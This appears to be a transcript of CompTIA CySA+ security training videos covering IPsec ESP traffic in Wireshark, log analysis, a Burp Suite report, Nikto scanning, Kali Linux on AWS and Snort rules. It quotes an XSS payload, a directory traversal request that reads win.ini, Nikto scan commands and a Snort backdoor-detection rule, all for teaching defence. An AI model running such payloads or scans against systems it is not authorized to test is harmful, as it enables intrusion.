Security Payload. This is a configuration of IPsec that encrypts the data part of the packet. Now when I do that,
we see that we have numerous captured packets using ESP, or Encapsulating Security Payload.
[Video description begins] When he enters esp in the filter toolbar, the table in the packet list pane now
contains only the packets with Protocol listed as ESP. The first packet that appears in the table is selected. The
packet details pane contains the following nodes: Frame 721, Ethernet II, Internet Protocol Version 4, and
Encapsulating Security Payload. [Video description ends]
Let's examine the packet headers. So I'm going to select one of them. So just like normal, we can see the
Ethernet header. So there's the source and destination MAC address. We can also see the IP header. So again,
that's got the source and destination IP as opposed to MAC addresses. So none of that stuff has been encrypted
because otherwise network routing equipment would have to have a decryption key to be able to see the IP
addresses to make a routing decision. So ESP doesn't do that.
And then we have an Encapsulating Security Payload header. So at this point, I don't know whether there should be a UDP, TCP, or ICMP header here. And that's the point: we can't even tell what kind of traffic it is. We can only see up to Layer 3 of the OSI model. The Ethernet header maps to Layer 2, the data-link layer of the OSI model, with its MAC addresses.
Then we've got Layer 3, the IP protocol with IP addresses. And that's as much as we can see. Now if you're going to be using Encapsulating Security Payload, or ESP, bear in mind that anything with a dependency on seeing port numbers, such as a packet-filtering firewall, isn't going to be able to see them. Of course, that would only apply to the machines that are communicating using IPsec with ESP. But because everything after the IP header is encrypted, we can't even tell whether it's TCP or UDP, let alone see a port number. And that is the purpose of Encapsulating Security Payload.
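For reference, the same filtering can also be done outside the GUI; a minimal sketch using Wireshark's display filter syntax and the command-line tshark tool, assuming the capture file name used in this demo:

tshark -r IPSec_ESP_Ping.pcap -Y "esp"
tshark -r IPSec_ESP_Ping.pcap -Y "ip.proto == 50"

Both filters match the same packets, since ESP is IP protocol number 50, and either way only the outer IP header and the ESP header are visible.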
Objectives
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, we've examined how to mitigate security threats against data at rest and data in transit using
patching, data masking, secure disposal, IPsec, and more. We did this by exploring IT security threat
remediation challenges and the importance of hardware and software patching. We looked at the various
security control categories and the components of organizational security policies.
We looked at how to enable data masking in Microsoft Azure and how to work with watermarks in AWS with
Elastic Transcoder, talked about the use of compliance baselines and various types of IT security training
exercises. We also took a look at how to use automation to simplify and expedite security tasks.
We talked about how to securely delete a disk partition, how to use Microsoft Group Policy password lockout
settings, how to secure IP traffic with IPsec, and, finally, how to turn on IPsec in Windows and analyze IPsec
network traffic. In our next course, we'll move on to explore intrusion detection and network traffic analysis
using the Snort IDS tool among others.
Table of Contents
[Video description begins] Topic title: Course Overview. Your host for this session is Dan Lachance. He is an
IT Trainer / Consultant. [Video description ends]
Hi, I'm Dan Lachance. I've worked in various IT roles since the early 1990s, including as a technical trainer, as
a programmer, a consultant, as well as an IT tech author and editor. I've held and still hold IT certifications
related to Linux, Novell, Lotus, CompTIA, and Microsoft. Some of my specialties over the years have
included networking, IT security, cloud solutions, Linux management and configuration, and troubleshooting
across a wide array of Microsoft products. The CS0-002 CompTIA Cybersecurity Analyst, or CySA+, certification exam is designed for IT professionals looking to gain security analyst skills: to perform data analysis to identify vulnerabilities, threats, and risks to an organization; to configure and use threat detection tools; and to secure and protect an organization's applications and systems.
In this course, we're going to explore how to analyze network traffic to detect the occurrence of malicious attacks. I'll start by examining how to analyze suspicious log entries, view a simple Burp Suite report, use Nikto to scan a web app, and perform a Kali Linux cloud deployment. I'll then install and configure the Snort IDS tool and create a Snort IDS rule, and I'll demonstrate how to analyze both an ICS traffic capture and HTTP user authentication traffic.
Next, I'll demonstrate how to perform voice over IP traffic analysis and online network traffic analysis, and how to decrypt wireless traffic in Wireshark. I'll continue by demonstrating the use of hashing to detect file changes through steganography, how to use the EERO app to monitor, block, and configure notifications for Wi-Fi connected devices, and how to perform encryption for sensitive files. I'll then demonstrate how to use Aircrack-ng to crack protected Wi-Fi networks and how to use Kismet to detect Wi-Fi networks. Lastly, I'll use Nessus to audit Amazon Web Services and to scan LAN hosts for malware.
[Video description begins] Topic title: Sample Log Entry Analysis. The presenter is Dan Lachance. [Video
description ends]
One important aspect of a cybersecurity analyst's job is to be able to analyze logs and alerts and make sense of them. Let's take a look at some example log entries from a variety of different types of network devices.
[Video description begins] He opens a file called "Log_Analysis_Anomalies.pdf". [Video description ends]
Our first example shows us NetBIOS traffic; we've got a date and timestamp.
[Video description begins] The following example of NetBIOS traffic is displayed: Jun 30 15:55:19 pf. Jun 30 15:48:03.688233 rule 3/(match) pass out on xl0: 192.168.2.10 > 192.168.2.100: icmp: 192.168.2.100 udp port 137 unreachable. [Video description ends]
And it looks like there's a match made with a firewall rule. However, we can see that it's trying to talk to UDP port 137, which is unreachable. UDP port 137 is used by the NetBIOS Name Service protocol, which is part of Samba or SMB. Samba is the implementation of Server Message Block that runs on open source platforms like Linux; in Windows, it's SMB, Server Message Block. The purpose here is to use it to return NetBIOS computer names. Now there are many known vulnerabilities related to NetBIOS and SMB services on port 137, and even the Metasploit Framework has exploits that address this weakness. So this log is a good entry because we can see that port 137 is not reachable. But what we're seeing is an attempt to connect to it to discover NetBIOS names. Our next example deals with network flooding.
[Video description begins] The following example of Network flood is displayed: [00001] 2020-03-10 8:47:22
[Root]system-critical-00001(third traffic alarm): Policy ID=4 Rate=190 bytes/sec exceeds threshold. [Video
description ends]
We can see that we have what appears to be a third traffic alarm, and there's a policy ID associated with this that's picking up that it's happening. We can also see that the policy has detected a rate of 190 bytes per second that exceeds a configured threshold. Now, what does this mean? It could be normal; we need a baseline of what's normal at this time of day. If it's normal early in the morning, at 8:47 and 22 seconds, for everyone to be checking their email, maybe this is normal for this network.
It also depends on which network we're talking about here – one that does or does not contain an email server. However, if this is not normal, it could be indicative of some kind of attack, maybe a distributed denial of service attack, where we might take steps to mitigate it by routing the traffic to nowhere, such as a null device. That would be akin to black holing, which is one way to mitigate this type of attack.
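As a rough illustration of that idea, on a Linux router you could null-route a prefix with the iproute2 tool; this is only a sketch, and the address range shown is a placeholder:

ip route add blackhole 203.0.113.0/24

Traffic routed toward that range is then silently dropped instead of being forwarded. The next thing we see is an indication of SMTP Relay.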
[Video description begins] The following example of SMTP Relay is displayed: Apr 9 11:40:15 mail-sm-
mta[64376]: ruleset=check_relay, arg1=adsl199-92-91-206-196.adsl196-3.iam.net.ma, arg2=196.206.91.97,
relay=adsl196-97-91-206-196.adsl196-3.iam.net.ma [196.206.91.97], reject=553. [Video description ends]
So it looks like relay here is being rejected, which is good. Most modern SMTP server daemons do not allow relay by default, but it's an important configuration check when you're hardening an email server that supports SMTP. Relay means what it says: anyone can connect to the SMTP server and have it relay messages to any other email domain. The problem with this is that it could be used by malicious users for email spamming campaigns, which in turn can be used to deliver malicious software, including ransomware.
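One quick way to check for an open relay from the outside is with an Nmap script; this is a hedged example, and the mail server name is hypothetical:

nmap -p 25 --script smtp-open-relay mail.example.com

The script attempts a series of relay tricks against the SMTP service on port 25 and reports whether any of them are accepted. In our last example, we have an example of a brute force password attack.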
Now we know this because it looks like there are multiple usernames at the end of each line that are tried in an attempt to make a connection, and we keep getting user-not-found messages returned. So this indicates that a brute force password attack is taking place against this particular host. Now what can be done to mitigate this type of problem? The best solution would be to control access to the host in the first place. But if this is a public host that needs public visibility, maybe to allow remote users or users working from home to connect, that exposure might be a necessity. Although there are ways around that, such as requiring a VPN connection first, so it's not directly open to everybody on the Internet.
We could also enable account lockout threshold settings. But that's not going to stop someone from trying to run this type of automated attack against the accounts; it would just lock an account that is brute forced with multiple passwords. So we need to be aware of where log files are – ideally they're being delivered centrally – and how to notice anomalies. Ideally, this would also be automated; automation plays a big part here. You can configure a lot of network security appliances with rules that are specific to your environment that will look for specific indicators of compromise.
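For example, on a Linux host running OpenSSH, a rough one-liner like this can surface the noisiest sources of failed logins; field positions depend on your log format, so treat it as a sketch:

grep "Failed password" /var/log/auth.log | awk '{print $(NF-3)}' | sort | uniq -c | sort -rn | head

That counts failed-password entries per source IP address, which makes a brute force attempt stand out immediately; centralized logging and SIEM rules automate the same idea at scale.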
[Video description begins] Topic title: Burp Suite Reports. The presenter is Dan Lachance. [Video description
ends]
Specialists in any field need to have the correct tool set and know how to use it effectively. A carpenter needs the right tools, just like a stonemason does. An IT security analyst needs to know which tools to use for a given situation, and then how to interpret the results.
[Video description begins] A web page called "Burp Scanner Sample Report" opens. [Video description ends]
Burp Suite is a tool that's used for web app penetration testing and vulnerability identification. Basically, you configure the tool such that web browser traffic to an app is first sent through Burp Suite, so that Burp Suite is really acting as a man-in-the-middle or proxy tool. All requests to the app and the responses from it pass through Burp Suite, so Burp Suite can analyze them. As a pen tester, you can even use the tool to replay HTTP requests to analyze how the app responds. So here, we're looking at a sample report produced by running the Burp Scanner. The idea is to identify any weaknesses related to a web application that we need to address.
And so if you're familiar with the OWASP top 10, some of the items that might have been discovered will be
related to some common web application vulnerabilities. Now, here in our report, we have some bad news
because it looks like we have some high severity issues. Nobody wants to see that in a vulnerability report, especially for an important web application. As we scroll down in the report, we have a table of contents which is broken down by the problems that were discovered: SQL injection, OS command injection, File path traversal, XML external entity injection – it just goes on and on. For example, let's go down to
Cross-site scripting (reflected) and see what's up. So there's a background statement about what it is.
[Video description begins] He clicks a link called "9. Cross-site scripting (reflected)" and the corresponding
section opens. [Video description ends]
And also, some steps for remediating the issue. However, when we take a look at this, it doesn't really look like we have too many problems other than a couple of instances on a couple of pages of the web app. So if we click on any one of those, then we get the details. This is high severity.
[Video description begins] He clicks a link called "/search/11/Default.aspx [Search Term parameter]". A section called "9.1. http://mdsec.net/search/11/Default.aspx [Search Term parameter]" opens. It further includes sections called "Summary", "Issue detail", "Request", and "Response". [Video description ends]
We can actually see the request here that was captured by Burp Suite. It's highlighted in yellow.
[Video description begins] The following is the highlighted text in the Request and Response sections:
a5e5b5<script>alert(1)</script>5fd408f4c442ba780. [Video description ends]
What's happening is that it looks like JavaScript is being injected within a field or a button, or it could be sent to the application via a URL parameter. Now, the problem with this is that the JavaScript code will execute on client browsers that view the page.
[Video description begins] He points to the highlighted text in the Response section. [Video description ends]
And so the problem with this is that we aren't properly validating the input to the app. We are allowing
untrusted, and in this case, malicious executable input from the user that gets executed when clients view it. So
we have some details here about what to do. And we see the issue here. It says, the value of the SearchTerm
request parameter is copied into the HTML document. And then that's how this attack was taking place. So you
get a lot of details in a Burp Suite report about that kind of stuff.
[Video description begins] He highlights the following text in the Issue detail section: The value of the
SearchTerm request parameter is copied into the HTML document as plain text between tags. [Video
description ends]
Let's go back to our table of contents. Let's look at File path traversal.
[Video description begins] He clicks a link called "3. File path traversal" and the corresponding section
opens. It further includes sections called "Summary", "Issue detail", "Issue background", "Issue remediation",
"Request", and "Response". [Video description ends]
So when you're looking at file systems, dot dot usually means to go back one level, whereas a single dot indicates the current directory. So having a payload with ..\..\ and so on allows attackers to potentially go back in the file system of a web app, beyond the file system location that houses the web app files.
[Video description begins] He highlights the following text in the Summary section: Host:
http://mdsec.net. [Video description ends]
Now, it looks like the issue here is that on our given host that was tested, there is a Path here that refers to
some code to retrieve a file.
[Video description begins] He highlights the following text in the Summary section: Path:
/filestore/8/GetFile.ashx. [Video description ends]
Now, if we ask it to retrieve a file and give it this kind of a path reference, then, if it's not properly hardened, the web app might allow directory traversal to expose other parts of the file system that definitely should not be seen from the web.
[Video description begins] He highlights the following text in the Issue detail section: The
payload ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini was submitted in the filename parameter. [Video
description ends]
So down below, as always, we have issue remediations. So it talks about validation on user input.
[Video description begins] He highlights the following text in the Issue remediation section: User-controllable
data should be strictly validated before being passed to any filesystem operation. [Video description ends]
And then it talks about using specific and trusted filesystem APIs after validating user input to ensure that this
doesn't happen. So we can see the request here, and we can see the response.
[Video description begins] He highlights the following text in the Issue remediation section: After validating
user input the application can use a suitable filesystem API to verify that the file to be accessed is actually
located within the base directory used by the application. [Video description ends]
What's happening in the request is that directory traversal is being used to go back into the Windows folder on the host to open up the win.ini file. And sure enough, we can see the contents of the win.ini file being returned.
[Video description begins] He points to the following line of code in the Request section, code starts: GET
/filestore/8/GetFile.ashx?filename=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1. Code
ends. [Video description ends]
And there are ways to solve this kind of problem. Burp Suite is similar to the OWASP ZAP tool – the Zed Attack Proxy. That OWASP tool does the same type of thing: it allows the examination of web app requests and responses, and it can also crawl a web app looking for vulnerabilities. In the end, these tools allow people to harden their web applications.
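As a rough illustration of the base-directory check mentioned in the remediation above, here is a minimal shell sketch; the base path and the filename variable are hypothetical, and a real web app would do this with its own filesystem API:

base=/var/www/filestore              # directory that is allowed to be served
requested="$base/$filename"          # $filename is untrusted user input
case "$(realpath -m -- "$requested")" in
  "$base"/*) cat -- "$requested" ;;  # resolved path stays under the base directory
  *) echo "rejected: path traversal attempt" >&2 ;;
esac

The key point is that the path is fully resolved first and only then compared against the permitted base directory, which defeats ../ or ..\ sequences.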
[Video description begins] Topic title: Nikto Web App Scanning. The presenter is Dan Lachance. [Video
description ends]
Nikto, N-I-K-T-O, is yet another web app scanning tool that will identify vulnerabilities of many different
kinds.
[Video description begins] He opens a command prompt window called "dlachance@kali: ~". The following
prompt is displayed: root@kali:~#. [Video description ends]
Here in Kali Linux, Nikto is already installed. I'm going to start by running nikto with a dash capital H for help. And I'm going to pipe that to the more command to stop after the first screenful.
[Video description begins] He executes the following command: nikto -H | more. The output displays the
details of nikto. The prompt does not change. [Video description ends]
We can kind of advance through this by just hitting our space bar.
[Video description begins] He points to the following text: -Tuning+ in the output. [Video description ends]
As I go all the way down through, I see that I have a -Tuning+ parameter where I can specify one or more of
these numbers together to run a couple of different types of scan tests such as 9 for SQL Injection.
[Video description begins] He highlights the following text: 9 SQL Injection. [Video description ends]
Or 6 to scan for Denial of Service vulnerabilities.
[Video description begins] He highlights the following text: 6 Denial of Service. [Video description ends]
Or 4 for cross site scripting injection type of weaknesses that might be shown.
[Video description begins] He highlights the following text: 4 Injection (XSS/Script/HTML).[Video description
ends]
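For example, to limit a run to certain classes of checks, the tuning codes can simply be concatenated; a hedged example against the same test host used in this demo:

nikto -h 192.168.4.54 -Tuning 469

That run would restrict the tests to injection (XSS/Script/HTML), denial of service, and SQL injection checks.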
[Video description begins] He executes the following command: clear. The screen gets cleared and the prompt
does not change. [Video description ends]
So nikto, and I'm going to put in -h, lowercase h. And I'm going to specify the IP address of a web app under my control that I know has some problems – it's got some vulnerabilities. And what I'm going to do is simply press Enter. We're going to start with that and see what the returned output is.
[Video description begins] He executes the following command: nikto -h 192.168.4.54. The output displays the
details of the IP address entered in the command. The prompt does not change. [Video description ends]
So it's scrolling through and checking out the web app. And as I scroll back up to the top, I can see it's already identified some items, such as the version of the Apache server. We see here it's Apache 1.3.28. We don't want that exposed. That's always a problem when it comes to attackers or potential attackers finding out that kind of information. I can also see the version of OpenSSL here, which is ancient and has many well-known vulnerabilities. And as we keep going back down – it's still running – we can see that it was able to go into certain subdirectories that probably should not be opened up, at least not prior to authenticating to the web app. So we could, of course, explore those in a web browser to see what we could learn by visiting them.
[Video description begins] He highlights the following text: /backup/, /cgi-bin/test.cgi, /icons/, and
/images/. [Video description ends]
But there's a lot of other stuff that you can do with Nikto. So let's move on. First thing I'm going to do is run
nikto, again -h.
[Video description begins] He clears the screen and the prompt does not change. [Video description ends]
So I'll just bring up the previous command with the up arrow key, so I'm really just going to be adding to it. I'm going to use the dash capital D, or Display, parameter. And I'm going to pass it a capital V for Verbose. So the only thing I'm doing here is asking for more details as it checks for everything.
[Video description begins] He executes the following command: nikto -h 192.168.4.54 -Display V. The output
displays the details of the IP address entered in the command. The prompt does not change. [Video description
ends]
Now we can see from the output that, indeed, there's a lot more showing now that we're asking for that display. And it raises the question: how am I supposed to go through that and derive any meaning from it? Scrolling by on the screen doesn't mean anything. So I'm going to press Ctrl+C to interrupt that. We're going to bring up the previous command again with the up arrow key, because we want to talk about writing the output to a file with the dash lowercase o parameter. What I'm going to do is put this on the root of the file system and call it /niktoscan.html, so HTML will be the file format. Let's go ahead and press Enter to let that happen.
[Video description begins] He clears the screen and the prompt does not change. He executes the following
command: nikto -h 192.168.4.54 -Display V -o /niktoscan.html. The output displays the details of the IP
address entered in the command. The prompt does not change. [Video description ends]
Now using the Kali Linux GUI, I've navigated into the root of the file system where indeed I can see the
niktoscan.html file. Let's go ahead and double-click on that to open it up, just to get a sense of what the HTML
report or output looks like. So here we can see the results of our scan in HTML format.
[Video description begins] He opens a window called "File System - File Manager". He double-clicks the
niktoscan.html file and the file opens. [Video description ends]
So we can see the IP address of the host and the port number in this case 80. And the first thing I see is the
version of the Apache server.
[Video description begins] He highlights the following text: 192.168.4.54/ 192.168.4.54 port 80. [Video
description ends]
This is much easier to read than the screen output. And I can see a number of things that were tested.
[Video description begins] He points to the following text: HTTP Server: Apache/1.3.28 (Unix) mod_ssl/2.8.15
OpenSSL/0.9.7c. [Video description ends]
For example, the anti-clickjacking X-Frame-Options header is not present – that's a vulnerability. And as we keep scrolling through here, it looks like directory indexing has been found for the /backup folder on the website. Directory indexing would allow someone to list the contents of that folder, either through command line means or simply by browsing to it in a web browser. So we have a number of entries here, then, that
really need to be addressed to harden that web application. And that's really the purpose of Nikto. But it can
also identify specific types of weaknesses. Let's go back to the command prompt and examine that aspect of
the Nikto command line tool. So as an example, I'm just going to clear the screen. And I'm going to run nikto
once again, -h for host.
[Video description begins] He clears the screen and the prompt does not change. [Video description ends]
And I'll specify the IP address of our test web server. But what I want to do this time is use the -Tuning command line option. With -Tuning, we can specify certain types of things that we want to check for. For example, a number 6 here means we want to test for denial of service types of vulnerabilities. And if that's all we wanted to do, that's great, but we can also put together other numbers. So, for example, nine means we want to test for SQL injection vulnerabilities. We can put this all together, for example, with -Display, so we want verbose display. And at the same time, we can also output that to a file. So I'm going to put this into a file on the root called niktoscan2. And again, it's going to be an HTML file.
[Video description begins] He executes the following command: nikto -h 192.168.4.54 -Tuning 69 -Display V -
o /niktoscan2.html. The output displays the details of the IP address entered in the command. The prompt does
not change. [Video description ends]
[Video description begins] Topic title: Kali Linux Cloud Deployment. The presenter is Dan Lachance. [Video
description ends]
Kali Linux is a great example of a free tool that has numerous penetration testing tools in one place.
[Video description begins] He opens a web site called "kali.org". [Video description ends]
It can be used for ethical hacking. Of course it can also be used by malicious users for nefarious tasks.
However, in the cloud environment, we can also deploy Kali Linux as a virtual machine appliance.
[Video description begins] A web page called "AWS Management Console" opens. [Video description ends]
So as opposed to downloading a Kali Linux ISO image and building an on-premises virtual machine, we might opt to do it in the cloud.
[Video description begins] He opens the kali.org web site and closes the tab. [Video description ends]
So we're going to do that using Amazon Web Services where I've already signed in to the AWS Management
Console.
[Video description begins] He opens the AWS Management Console. [Video description ends]
I'm going to start by going down under All services Compute and EC2.
[Video description begins] A web page called "EC2 Management Console" opens. [Video description ends]
[Video description begins] A web page called "Instances | EC2 Management Console" opens. [Video
description ends]
I'll click the Instances view on the left and then I'll click Launch Instance up at the top.
[Video description begins] He clicks a button called "Launch Instance" and a page called "Step 1: Choose an
Amazon Machine Image (AMI)" opens. [Video description ends]
The key here is to select the appropriate Amazon Machine Image, or AMI. This is essentially a blueprint of the operating system, and any additional software, that will be used to build the virtual machine. So I'm going to search here for kali and I'll press Enter. Now it says there were none found in the quick start catalog, nothing related to kali. But there is one result in the AWS Marketplace and 14 results in community AMIs. I'm going to click the AWS Marketplace result, and it looks like we have a Kali Linux distribution there that's Free tier eligible. I'm going to go ahead and Select that Amazon Machine Image.
[Video description begins] He clicks a button called "Select" adjacent to an option called "Kali Linux". A
window called "Kali Linux" opens. [Video description ends]
[Video description begins] He clicks a button called "Continue" and the Kali Linux window closes. A page
called "Step 2: Choose an Instance Type" opens. [Video description ends]
I'm going to go through and select the other details related to this virtual machine, such as the Instance Type.
In the AWS cloud, all that means is how much underlying horsepower there is for the virtual machine. In terms
of vCPUs, the amount of Memory, and so on. So I'm going to go ahead and choose General purpose t2.micro
as an Instance Type, which is 1 vCPU and 1 GiB of RAM. Then I'm going to click Next.
[Video description begins] He clicks a button called "Next: Configure Instance Details". A page called "Step
3: Configure Instance Details" opens. [Video description ends]
I can determine whether I want to Enable a Public IP address for this host so I can connect to it directly, such
as using the free PuTTY tool to make an SSH connection.
[Video description begins] He clicks a drop-down list box called "Auto-assign Public IP" and selects an
option called "Enable". [Video description ends]
I'm going to click Next. I could also add additional storage volumes, which I won't.
[Video description begins] He clicks a button called "Next: Add Storage". A page called "Step 4: Add Storage"
opens. [Video description ends]
[Video description begins] He clicks a button called "Next: Add Tags". A page called "Step 5: Add Tags"
opens. [Video description ends]
And I'm going to use the Name tag and call it Kali Linux. That'll show up when I look at my Instances view. Then I'll click Next.
[Video description begins] He clicks a button called "Add Tag". He enters Name under a column header
called "Key" and Kali Linux under the column header called "Value". [Video description ends]
It wants to open up SSH port 22 for remote management from any location. Of course, here I could specify the
IP address, my public facing IP address, if I'm going to be doing this from on premises. But I'll leave it as it is
for now. Now I'll click on Review and Launch, then I'll click Launch.
[Video description begins] He clicks a button called "Review and Launch". A page called "Step 7: Review
Instance Launch" opens. [Video description ends]
In Amazon Web Services, if you haven't already, you have to create a key pair that has a public and a private part.
[Video description begins] He clicks a button called "Launch". A dialog box called "Select an existing key pair
or create a new key pair" opens. [Video description ends]
The public part is stored by Amazon; you download and store the private part of the key, so you have to safeguard it. I've already done that, so I don't have to Create a new key pair – I can choose an existing one. I'll just acknowledge that I have the private key, and I'll choose Launch Instances.
[Video description begins] He clicks a button called "Launch Instances". [Video description ends]
After a moment, our Kali Linux virtual machine will be deployed in the AWS cloud. If I select it, I can also
choose to Copy the public IP address which I'll need if I want to make an SSH connection.
[Video description begins] The Instances | EC2 Management Console page opens. [Video description ends]
But before I can do that, I need to take the Amazon Web Services private key, which is part of the key pair we
mentioned.
[Video description begins] He clicks a button called "Copy to Clipboard" adjacent to an option called "IPv4
Public IP 54.88.124.128". [Video description ends]
And I need to convert it to a format that's consumable by the free PuTTY tool, which I'll use to make an SSH connection to Kali Linux in Amazon Web Services.
[Video description begins] A dialog box called "PuTTY Key Generator" opens. [Video description ends]
So in the PuTTY Key Generator, then, I need to Load an existing private key file – that's the AWS one – and just save it back so that it's in a format used by PuTTY. I've already done this.
[Video description begins] A dialog box called "PuTTY Configuration" opens. [Video description ends]
So here in the PuTTY tool itself on the left if I go under Connection, SSH, Auth I've already specified the
converted private key file for AWS.
[Video description begins] A command window called "54.88.124.128 - PuTTY" opens. The following prompt
is displayed: login as:. [Video description ends]
It doesn't want an account password, but it does want the passphrase I assigned when I converted the private key on my local machine. So I'm going to go ahead and enter that.
[Video description begins] The following prompt is displayed: ec2-user@kali:~$. [Video description ends]
And at this point, we are now in Kali Linux, which is running in the public cloud environment.
[Video description begins] He executes the following command: clear. The screen gets cleared and the prompt
does not change. [Video description ends]
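As an aside, if you'd rather not convert the key for PuTTY, the same connection can be made with a standard OpenSSH client; a minimal sketch, where the key file name is hypothetical and the IP address is the public one assigned to this instance:

chmod 400 kali-key.pem
ssh -i kali-key.pem [email protected]

The chmod step matters because OpenSSH refuses to use a private key file that other users can read.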
During this video, you will learn how to install and configure the Snort IDS tool, as well as how to sinkhole
and use antivirus heuristics.
Objectives
install and configure the Snort IDS tool, with mention of sinkholes and antivirus heuristics
[Video description begins] Topic title: Snort Installation. The presenter is Dan Lachance. [Video description
ends]
Well, we can see that the creators of Snort have a sense of humor and have chosen a fun logo.
[Video description begins] A web site called snort.org" opens. It is divided into two parts. The first part is a
menu bar. It includes options called "Documents", "Download", "Products", "Community", "Tools",
"Resources", and "Contact". The second part is a content pane. [Video description ends]
Snort is an Intrusion Detection System or IDS. It uses rules that you can customize to look for certain types of
behavior on the network or on a host, and then take specific types of actions. So it's a lot more than just packet
capturing on the network and then writing to a log; you can get a little more in-depth with Snort. Snort runs on multiple platforms, so we can think about downloading the actual engine itself, but also the latest rules. There are always some community rules available, and of course, you can tweak them.
[Video description begins] The sections called "Binaries", "Source", "MD5s", and "Documentation" are displayed in the content pane. [Video description ends]
So if I go to the Downloads link here for snort.org, we can see we've got the Binaries and also the Source code, if you actually wanted to compile it yourself. Compiling it yourself on a specific Linux machine usually results in better performance optimization than using a prebuilt binary. Now, notice we've got various formats for Linux, such as Red Hat Package Manager or RPM packages, but we also have an Installer.exe for Windows.
[Video description begins] He clicks a link called "Snort_2_9_15_1_Installer.exe" under the Binaries
section. [Video description ends]
So I'm going to go ahead and download that one for the Windows platform.
[Video description begins] A dialog box called "User Account Control" opens. He clicks a button called "Yes"
and the dialog box closes. An installation wizard window called "Snort 2.9.15.1 Setup" opens. A page called
"License Agreement" is open. [Video description ends]
It's pretty small, so once it's downloaded, I'm going to go ahead and click on that to begin the installer.
[Video description begins] He clicks a button called "I Agree" and a page called "Choose Components"
opens. [Video description ends]
So I'm going to choose I Agree to the License Agreement, which of course, I've read.
[Video description begins] He clicks a button called "Next" and a page called "Choose Install Location"
opens. [Video description ends]
And I'm going to accept pretty much most of the defaults other than I'm going to install this on drive D, in the
folder called Snort, as opposed to drive C.
[Video description begins] He enters the text D:\Snort in a text box called "Destination Folder". He clicks a
button called "Next" and installation begins. [Video description ends]
And then I'll click Close and it says, Snort has successfully been installed.
[Video description begins] A message box called "Snort 2.9.15.1 Setup" opens. [Video description ends]
It also needs the WinPcap component, which I already have installed because I'm running Wireshark on this
same machine.
[Video description begins] He clicks a button called "OK" and the message box and the installation wizard
window closes. A command window called "Administrator: Command Prompt" opens. The following prompt is
displayed: D: \>. [Video description ends]
So in that same host, I'll go to drive D, I'll change directory to my installation directory Snort.
[Video description begins] He executes the following command: cd snort. No output is displayed and the
prompt changes to D:\Snort>. [Video description ends]
I do dir, we can see some structure here.
[Video description begins] He executes the following command: dir. The output displays list of directories.
The prompt does not change. [Video description ends]
I'm going to go into the bin or binary directory, and I'm going to clear the screen, type dir.
[Video description begins] He executes the following command: cd bin. No output is displayed and the prompt
changes to D:\Snort\bin>. He executes the following command: cls. The screen gets cleared and the prompt
does not change. [Video description ends]
[Video description begins] He executes the following command: dir. The output displays list of directories.
The prompt does not change. [Video description ends]
It's there, so snort --version, and here, we can see it's installed.
[Video description begins] He clears the screen and the prompt does not change. [Video description ends]
So at this point, we've got a basic core installation of Snort on the Windows platform.
[Video description begins] He executes the following command: snort --version. The output displays details of
the snort version. The prompt does not change. [Video description ends]
In a Linux environment, the distribution of Linux you're running will determine exactly what you do to install it.
[Video description begins] He opens a command window called: "dlachance@kali:~”. The following prompt
is displayed: root@kali : /#. [Video description ends]
For example, here on Kali Linux, it's already installed, but I'll just step through the motions anyway as if I were installing it with apt-get.
[Video description begins] He executes the following command: apt-get update. The update runs and the
prompt does not change. [Video description ends]
Normally, you'd run update to make sure everything is up to date in terms of the repositories.
[Video description begins] He executes the following command: clear. The screen gets cleared and the prompt
does not change. [Video description ends]
And then the next thing you would do is simply run apt-get install and tell it that you want to install Snort.
[Video description begins] He executes the following command: apt-get install snort. The output displays
details of snort. The prompt does not change. [Video description ends]
So I'm going to go ahead and try that, so apt-get install space snort, and it says, it's already the newest version,
you're already good to go.
[Video description begins] He highlights the following text in the output: snort is already the newest version
(2.9.7.0-5). He clears the screen and the prompt does not change. [Video description ends]
Okay, so just like on the Windows platform, then, I can run snort --version to ensure that it's recognized, and it
is.
[Video description begins] He executes the following command: snort --version. The output displays details of
the snort version. The prompt does not change. [Video description ends]
During this video, you will learn how to create a Snort IDS rule.
Objectives
[Video description begins] Topic title: Snort Rules. The presenter is Dan Lachance. [Video description ends]
[Video description begins] The snort.org web site opens. [Video description ends]
And an IDS needs rules to determine what it should be looking for that is considered anomalous in this specific
environment, and then what to do about it, such as to send some kind of an alert. So here on the snort.org page,
I can not only download the Snort engine itself, but also download a common rule set, which I'm going to do
by clicking on Rules. In this case, I'm going to choose Snort v2.9 community rules.
[Video description begins] He clicks a button called "Rules". A page called "Rules" opens. It includes sections
called "Community", "Registered", and "Subscription". [Video description ends]
[Video description begins] He clicks a link called "community-rules.tar.gz" under an option called "Snort v2.9" in the Community section. He opens the File Explorer window. He right-clicks a file called "community-rules.tar.gz" and selects an option called "7-Zip". [Video description ends]
On my computer, I've got 7-Zip installed. This is a tool that allows me to extract compressed archives. So what
I'm going to do is choose Extract Here. And we can see it results in a .tar file, a tape archive file, so I'm going
to right-click on it, choose 7-Zip, and also choose to extract it here. Finally, we now see a community-rules folder, where I can see we have a number of files; the largest file here is called community.rules. I'm going to go ahead and open up that text file.
[Video description begins] A WordPad file called "community.rules" opens. [Video description ends]
And so in this community rules file, we can scroll down and start to read the details, the actual syntax. Now
bear in mind anything that's got a pound symbol or a # in front of it is a comment.
[Video description begins] He points the following text: # alert tcp $HOME_NET 2589 -> $EXTERNAL_NET
any (msg:"MALWARE-BACKDOOR - Dagger_1.4.0"; flow: to_client, established; content:"2|00 00 00 06 00
00 00|Drives|24 00|"; depth:16; metadata: ruleset community; classtype:misc-activity; sid:105;
rev:14;). [Video description ends]
So the first keyword we see here is to generate an alert, such as if you're running Snort and you want an alert
written to the console, then the protocol. Then we can see the source location. The $HOME_NET is a variable
that exists inside of the Snort config file. Let's take a look at that for one sec.
[Video description begins] The dlachance@kali: ~ command prompt window opens. The following prompt is
displayed: root@kali:~#. [Video description ends]
So here, on my Linux box where I'm going to run Snort, what I want to do is simply run the nano command – we want to take a look at our Snort config. That's going to be in the /etc directory, under snort, and the file is called snort.conf.
[Video description begins] He executes the following command: nano /etc/snort/snort.conf. The contents of the
file are displayed in GNU nano 4.8. [Video description ends]
So let's just scroll down here a little bit to see what's up. Here we can see we've got a variable called HOME_NET, and it's set to any. But we could put in a specific IP network range if we wanted to. The point is that these variables can be referred to within rules. So let's just press Ctrl+X to get out of there. Back in our rule, we can see a port number.
[Video description begins] He switches back to the community.rules WordPad file. [Video description ends]
